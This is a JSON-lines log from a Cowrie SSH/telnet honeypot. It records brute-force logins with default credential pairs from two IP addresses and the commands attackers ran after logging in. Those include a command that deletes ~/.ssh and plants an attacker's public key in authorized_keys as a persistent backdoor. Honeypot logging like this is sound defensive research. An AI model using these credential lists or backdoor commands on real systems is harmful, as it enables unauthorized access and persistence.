{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.7","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:07:49.846282Z","src_ip":"103.12.154.87","session":"0d0b85279f8f"}
{"eventid":"cowrie.session.connect","src_ip":"103.12.154.87","src_port":49766,"dst_ip":"1.2.3.4","dst_port":22,"session":"694cde06a92e","protocol":"ssh","message":"New connection: 103.12.154.87:49766 (1.2.3.4:22) [session: 694cde06a92e]","sensor":"my-vps","timestamp":"2025-08-26T07:07:51.042997Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T07:07:51.045718Z","src_ip":"103.12.154.87","session":"694cde06a92e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T07:07:51.460596Z","src_ip":"103.12.154.87","session":"694cde06a92e"}
{"eventid":"cowrie.session.connect","src_ip":"156.244.14.187","src_port":33828,"dst_ip":"1.2.3.4","dst_port":23,"session":"819e0e395d3b","protocol":"telnet","message":"New connection: 156.244.14.187:33828 (1.2.3.4:23) [session: 819e0e395d3b]","sensor":"my-vps","timestamp":"2025-08-26T07:07:55.294344Z"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T07:07:56.409995Z","src_ip":"103.12.154.87","session":"694cde06a92e"}
{"eventid":"cowrie.session.closed","duration":1.4274992942810059,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:07:56.721777Z","src_ip":"156.244.14.187","session":"819e0e395d3b"}
{"eventid":"cowrie.session.connect","src_ip":"156.244.14.187","src_port":33830,"dst_ip":"1.2.3.4","dst_port":23,"session":"c466933c5f90","protocol":"telnet","message":"New connection: 156.244.14.187:33830 (1.2.3.4:23) [session: c466933c5f90]","sensor":"my-vps","timestamp":"2025-08-26T07:07:56.878191Z"}
{"eventid":"cowrie.session.closed","duration":"6.6","message":"Connection lost after 6.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:07:57.629017Z","src_ip":"103.12.154.87","session":"694cde06a92e"}
{"eventid":"cowrie.session.closed","duration":30.560840129852295,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:07:58.349685Z","src_ip":"212.227.125.160","session":"81e9765bd8e7"}
{"eventid":"cowrie.session.closed","duration":1.8138914108276367,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:07:58.692016Z","src_ip":"156.244.14.187","session":"c466933c5f90"}
{"eventid":"cowrie.session.connect","src_ip":"156.244.14.187","src_port":50722,"dst_ip":"1.2.3.4","dst_port":23,"session":"11edf871336f","protocol":"telnet","message":"New connection: 156.244.14.187:50722 (1.2.3.4:23) [session: 11edf871336f]","sensor":"my-vps","timestamp":"2025-08-26T07:07:58.840892Z"}
{"eventid":"cowrie.session.connect","src_ip":"103.12.154.87","src_port":52530,"dst_ip":"1.2.3.4","dst_port":22,"session":"6eadb0c7aaee","protocol":"ssh","message":"New connection: 103.12.154.87:52530 (1.2.3.4:22) [session: 6eadb0c7aaee]","sensor":"my-vps","timestamp":"2025-08-26T07:07:58.882948Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T07:07:58.884022Z","src_ip":"103.12.154.87","session":"6eadb0c7aaee"}
{"eventid":"cowrie.session.closed","duration":1.5150833129882812,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:08:00.355910Z","src_ip":"156.244.14.187","session":"11edf871336f"}
{"eventid":"cowrie.session.connect","src_ip":"156.244.14.187","src_port":50736,"dst_ip":"1.2.3.4","dst_port":23,"session":"cf65d5380497","protocol":"telnet","message":"New connection: 156.244.14.187:50736 (1.2.3.4:23) [session: cf65d5380497]","sensor":"my-vps","timestamp":"2025-08-26T07:08:00.516417Z"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T07:08:01.425566Z","src_ip":"103.12.154.87","session":"6eadb0c7aaee"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin","message":"login attempt [admin/admin] failed","sensor":"my-vps","timestamp":"2025-08-26T07:08:01.866974Z","src_ip":"156.244.14.187","session":"cf65d5380497"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T07:08:02.992834Z","src_ip":"103.12.154.87","session":"6eadb0c7aaee"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:08:03.211180Z","src_ip":"103.12.154.87","session":"6eadb0c7aaee"}
{"eventid":"cowrie.session.closed","duration":"17.1","message":"Connection lost after 17.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:08:03.224429Z","src_ip":"103.12.154.87","session":"0d0b85279f8f"}
{"eventid":"cowrie.session.closed","duration":3.3998210430145264,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:08:03.914221Z","src_ip":"156.244.14.187","session":"cf65d5380497"}
{"eventid":"cowrie.session.connect","src_ip":"156.244.14.187","src_port":50740,"dst_ip":"1.2.3.4","dst_port":23,"session":"03b2419a8b53","protocol":"telnet","message":"New connection: 156.244.14.187:50740 (1.2.3.4:23) [session: 03b2419a8b53]","sensor":"my-vps","timestamp":"2025-08-26T07:08:04.065962Z"}
{"eventid":"cowrie.login.failed","username":"user","password":"user","message":"login attempt [user/user] failed","sensor":"my-vps","timestamp":"2025-08-26T07:08:04.997785Z","src_ip":"156.244.14.187","session":"03b2419a8b53"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-26T07:08:06.434031Z","src_ip":"156.244.14.187","session":"03b2419a8b53"}
{"eventid":"cowrie.session.closed","duration":3.184943675994873,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:08:07.250815Z","src_ip":"156.244.14.187","session":"03b2419a8b53"}
{"eventid":"cowrie.session.connect","src_ip":"156.244.14.187","src_port":50754,"dst_ip":"1.2.3.4","dst_port":23,"session":"73ef2c30e73d","protocol":"telnet","message":"New connection: 156.244.14.187:50754 (1.2.3.4:23) [session: 73ef2c30e73d]","sensor":"my-vps","timestamp":"2025-08-26T07:08:07.407829Z"}
{"eventid":"cowrie.session.closed","duration":1.6788606643676758,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:08:09.086617Z","src_ip":"156.244.14.187","session":"73ef2c30e73d"}
{"eventid":"cowrie.session.connect","src_ip":"156.244.14.187","src_port":33768,"dst_ip":"1.2.3.4","dst_port":23,"session":"925013ed576b","protocol":"telnet","message":"New connection: 156.244.14.187:33768 (1.2.3.4:23) [session: 925013ed576b]","sensor":"my-vps","timestamp":"2025-08-26T07:08:09.248650Z"}
{"eventid":"cowrie.login.failed","username":"telnet","password":"telnet","message":"login attempt [telnet/telnet] failed","sensor":"my-vps","timestamp":"2025-08-26T07:08:11.139476Z","src_ip":"156.244.14.187","session":"925013ed576b"}
{"eventid":"cowrie.session.closed","duration":4.428197145462036,"message":"Connection lost after 4 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:08:13.676781Z","src_ip":"156.244.14.187","session":"925013ed576b"}
{"eventid":"cowrie.session.connect","src_ip":"156.244.14.187","src_port":33776,"dst_ip":"1.2.3.4","dst_port":23,"session":"ab5f66448aa4","protocol":"telnet","message":"New connection: 156.244.14.187:33776 (1.2.3.4:23) [session: ab5f66448aa4]","sensor":"my-vps","timestamp":"2025-08-26T07:08:13.829659Z"}
{"eventid":"cowrie.session.closed","duration":4.763157606124878,"message":"Connection lost after 4 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:08:18.592755Z","src_ip":"156.244.14.187","session":"ab5f66448aa4"}
{"eventid":"cowrie.session.connect","src_ip":"156.244.14.187","src_port":51670,"dst_ip":"1.2.3.4","dst_port":23,"session":"d1ccfecd1062","protocol":"telnet","message":"New connection: 156.244.14.187:51670 (1.2.3.4:23) [session: d1ccfecd1062]","sensor":"my-vps","timestamp":"2025-08-26T07:08:18.746369Z"}
{"eventid":"cowrie.login.failed","username":"admin","password":"password","message":"login attempt [admin/password] failed","sensor":"my-vps","timestamp":"2025-08-26T07:08:19.600967Z","src_ip":"156.244.14.187","session":"d1ccfecd1062"}
{"eventid":"cowrie.session.closed","duration":3.2372889518737793,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:08:21.983574Z","src_ip":"156.244.14.187","session":"d1ccfecd1062"}
{"eventid":"cowrie.session.connect","src_ip":"156.244.14.187","src_port":51684,"dst_ip":"1.2.3.4","dst_port":23,"session":"dfbf216269be","protocol":"telnet","message":"New connection: 156.244.14.187:51684 (1.2.3.4:23) [session: dfbf216269be]","sensor":"my-vps","timestamp":"2025-08-26T07:08:22.140783Z"}
{"eventid":"cowrie.login.failed","username":"admin","password":"","message":"login attempt [admin/] failed","sensor":"my-vps","timestamp":"2025-08-26T07:08:24.220909Z","src_ip":"156.244.14.187","session":"dfbf216269be"}
{"eventid":"cowrie.session.closed","duration":4.095355272293091,"message":"Connection lost after 4 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:08:26.236071Z","src_ip":"156.244.14.187","session":"dfbf216269be"}
{"eventid":"cowrie.session.connect","src_ip":"156.244.14.187","src_port":51688,"dst_ip":"1.2.3.4","dst_port":23,"session":"d49b1b5f42b1","protocol":"telnet","message":"New connection: 156.244.14.187:51688 (1.2.3.4:23) [session: d49b1b5f42b1]","sensor":"my-vps","timestamp":"2025-08-26T07:08:26.392077Z"}
{"eventid":"cowrie.login.failed","username":"guest","password":"guest","message":"login attempt [guest/guest] failed","sensor":"my-vps","timestamp":"2025-08-26T07:08:27.800156Z","src_ip":"156.244.14.187","session":"d49b1b5f42b1"}
{"eventid":"cowrie.session.closed","duration":3.9031429290771484,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:08:30.295117Z","src_ip":"156.244.14.187","session":"d49b1b5f42b1"}
{"eventid":"cowrie.session.connect","src_ip":"156.244.14.187","src_port":40076,"dst_ip":"1.2.3.4","dst_port":23,"session":"1e213f022d20","protocol":"telnet","message":"New connection: 156.244.14.187:40076 (1.2.3.4:23) [session: 1e213f022d20]","sensor":"my-vps","timestamp":"2025-08-26T07:08:32.278496Z"}
{"eventid":"cowrie.session.closed","duration":4.986118316650391,"message":"Connection lost after 4 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:08:37.264541Z","src_ip":"156.244.14.187","session":"1e213f022d20"}
{"eventid":"cowrie.session.connect","src_ip":"156.244.14.187","src_port":40092,"dst_ip":"1.2.3.4","dst_port":23,"session":"b09457a3f3d1","protocol":"telnet","message":"New connection: 156.244.14.187:40092 (1.2.3.4:23) [session: b09457a3f3d1]","sensor":"my-vps","timestamp":"2025-08-26T07:08:37.431183Z"}
{"eventid":"cowrie.session.closed","duration":1.3134183883666992,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:08:38.744534Z","src_ip":"156.244.14.187","session":"b09457a3f3d1"}
{"eventid":"cowrie.session.connect","src_ip":"156.244.14.187","src_port":50024,"dst_ip":"1.2.3.4","dst_port":23,"session":"e447f159a9d2","protocol":"telnet","message":"New connection: 156.244.14.187:50024 (1.2.3.4:23) [session: e447f159a9d2]","sensor":"my-vps","timestamp":"2025-08-26T07:08:38.902712Z"}
{"eventid":"cowrie.login.failed","username":"support","password":"support","message":"login attempt [support/support] failed","sensor":"my-vps","timestamp":"2025-08-26T07:08:39.321550Z","src_ip":"156.244.14.187","session":"e447f159a9d2"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-26T07:08:40.810778Z","src_ip":"156.244.14.187","session":"e447f159a9d2"}
{"eventid":"cowrie.session.closed","duration":4.226213693618774,"message":"Connection lost after 4 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:08:43.128814Z","src_ip":"156.244.14.187","session":"e447f159a9d2"}
{"eventid":"cowrie.session.connect","src_ip":"156.244.14.187","src_port":50034,"dst_ip":"1.2.3.4","dst_port":23,"session":"60336ca29977","protocol":"telnet","message":"New connection: 156.244.14.187:50034 (1.2.3.4:23) [session: 60336ca29977]","sensor":"my-vps","timestamp":"2025-08-26T07:08:43.286017Z"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"ubnt","message":"login attempt [ubnt/ubnt] failed","sensor":"my-vps","timestamp":"2025-08-26T07:08:44.949628Z","src_ip":"156.244.14.187","session":"60336ca29977"}
{"eventid":"cowrie.session.closed","duration":3.983790636062622,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:08:47.269722Z","src_ip":"156.244.14.187","session":"60336ca29977"}
{"eventid":"cowrie.session.connect","src_ip":"156.244.14.187","src_port":50038,"dst_ip":"1.2.3.4","dst_port":23,"session":"d7415e2a9f25","protocol":"telnet","message":"New connection: 156.244.14.187:50038 (1.2.3.4:23) [session: d7415e2a9f25]","sensor":"my-vps","timestamp":"2025-08-26T07:08:47.428088Z"}
{"eventid":"cowrie.session.closed","duration":1.2960333824157715,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:08:48.724023Z","src_ip":"156.244.14.187","session":"d7415e2a9f25"}
{"eventid":"cowrie.session.connect","src_ip":"156.244.14.187","src_port":41762,"dst_ip":"1.2.3.4","dst_port":23,"session":"7d3d48e7e977","protocol":"telnet","message":"New connection: 156.244.14.187:41762 (1.2.3.4:23) [session: 7d3d48e7e977]","sensor":"my-vps","timestamp":"2025-08-26T07:08:48.879969Z"}
{"eventid":"cowrie.session.closed","duration":1.6008851528167725,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:08:50.480785Z","src_ip":"156.244.14.187","session":"7d3d48e7e977"}
{"eventid":"cowrie.session.connect","src_ip":"156.244.14.187","src_port":41772,"dst_ip":"1.2.3.4","dst_port":23,"session":"3b14f588a110","protocol":"telnet","message":"New connection: 156.244.14.187:41772 (1.2.3.4:23) [session: 3b14f588a110]","sensor":"my-vps","timestamp":"2025-08-26T07:08:50.635365Z"}
{"eventid":"cowrie.session.closed","duration":1.0276544094085693,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:08:51.662936Z","src_ip":"156.244.14.187","session":"3b14f588a110"}
{"eventid":"cowrie.session.connect","src_ip":"156.244.14.187","src_port":41786,"dst_ip":"1.2.3.4","dst_port":23,"session":"42bcff2d79c3","protocol":"telnet","message":"New connection: 156.244.14.187:41786 (1.2.3.4:23) [session: 42bcff2d79c3]","sensor":"my-vps","timestamp":"2025-08-26T07:08:51.816619Z"}
{"eventid":"cowrie.login.failed","username":"service","password":"service","message":"login attempt [service/service] failed","sensor":"my-vps","timestamp":"2025-08-26T07:08:52.262840Z","src_ip":"156.244.14.187","session":"42bcff2d79c3"}
{"eventid":"cowrie.session.closed","duration":3.9255659580230713,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:08:55.742101Z","src_ip":"156.244.14.187","session":"42bcff2d79c3"}
{"eventid":"cowrie.session.connect","src_ip":"156.244.14.187","src_port":41788,"dst_ip":"1.2.3.4","dst_port":23,"session":"b91bcba1998e","protocol":"telnet","message":"New connection: 156.244.14.187:41788 (1.2.3.4:23) [session: b91bcba1998e]","sensor":"my-vps","timestamp":"2025-08-26T07:08:55.898173Z"}
{"eventid":"cowrie.session.closed","duration":1.2464442253112793,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:08:57.144548Z","src_ip":"156.244.14.187","session":"b91bcba1998e"}
{"eventid":"cowrie.session.connect","src_ip":"156.244.14.187","src_port":41796,"dst_ip":"1.2.3.4","dst_port":23,"session":"ee10bf6784b4","protocol":"telnet","message":"New connection: 156.244.14.187:41796 (1.2.3.4:23) [session: ee10bf6784b4]","sensor":"my-vps","timestamp":"2025-08-26T07:08:57.295449Z"}
{"eventid":"cowrie.session.closed","duration":1.6227822303771973,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:08:58.918145Z","src_ip":"156.244.14.187","session":"ee10bf6784b4"}
{"eventid":"cowrie.session.connect","src_ip":"156.244.14.187","src_port":42186,"dst_ip":"1.2.3.4","dst_port":23,"session":"70bea7c62c4d","protocol":"telnet","message":"New connection: 156.244.14.187:42186 (1.2.3.4:23) [session: 70bea7c62c4d]","sensor":"my-vps","timestamp":"2025-08-26T07:08:59.128769Z"}
{"eventid":"cowrie.session.closed","duration":0.9960048198699951,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:09:00.124704Z","src_ip":"156.244.14.187","session":"70bea7c62c4d"}
{"eventid":"cowrie.session.connect","src_ip":"156.244.14.187","src_port":42192,"dst_ip":"1.2.3.4","dst_port":23,"session":"3e404038f517","protocol":"telnet","message":"New connection: 156.244.14.187:42192 (1.2.3.4:23) [session: 3e404038f517]","sensor":"my-vps","timestamp":"2025-08-26T07:09:00.282062Z"}
{"eventid":"cowrie.login.success","username":"root","password":"password","message":"login attempt [root/password] succeeded","sensor":"my-vps","timestamp":"2025-08-26T07:09:00.862126Z","src_ip":"156.244.14.187","session":"3e404038f517"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T07:09:00.884022Z","src_ip":"156.244.14.187","session":"3e404038f517"}
{"eventid":"cowrie.command.input","input":"echo SCANNER_TEST","message":"CMD: echo SCANNER_TEST","sensor":"my-vps","timestamp":"2025-08-26T07:09:01.087606Z","src_ip":"156.244.14.187","session":"3e404038f517"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","size":492,"shasum":"f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","duplicate":true,"duration":"1.5","message":"Closing TTY Log: var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:09:02.342408Z","src_ip":"156.244.14.187","session":"3e404038f517"}
{"eventid":"cowrie.session.closed","duration":2.0662167072296143,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:09:02.348215Z","src_ip":"156.244.14.187","session":"3e404038f517"}
{"eventid":"cowrie.session.connect","src_ip":"103.12.154.87","src_port":45950,"dst_ip":"1.2.3.4","dst_port":22,"session":"8a425aca82af","protocol":"ssh","message":"New connection: 103.12.154.87:45950 (1.2.3.4:22) [session: 8a425aca82af]","sensor":"my-vps","timestamp":"2025-08-26T07:09:03.995399Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T07:09:03.997734Z","src_ip":"103.12.154.87","session":"8a425aca82af"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T07:09:04.205451Z","src_ip":"103.12.154.87","session":"8a425aca82af"}
{"eventid":"cowrie.login.success","username":"root","password":"Ya123456","message":"login attempt [root/Ya123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T07:09:08.259265Z","src_ip":"103.12.154.87","session":"8a425aca82af"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T07:09:08.733884Z","src_ip":"103.12.154.87","session":"8a425aca82af"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T07:09:08.734568Z","src_ip":"103.12.154.87","session":"8a425aca82af"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T07:09:08.735827Z","src_ip":"103.12.154.87","session":"8a425aca82af"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:09:08.941875Z","src_ip":"103.12.154.87","session":"8a425aca82af"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T07:09:09.410235Z","src_ip":"103.12.154.87","session":"8a425aca82af"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T07:09:09.410926Z","src_ip":"103.12.154.87","session":"8a425aca82af"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T07:09:09.619283Z","src_ip":"103.12.154.87","session":"8a425aca82af"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:09:09.620155Z","src_ip":"103.12.154.87","session":"8a425aca82af"}
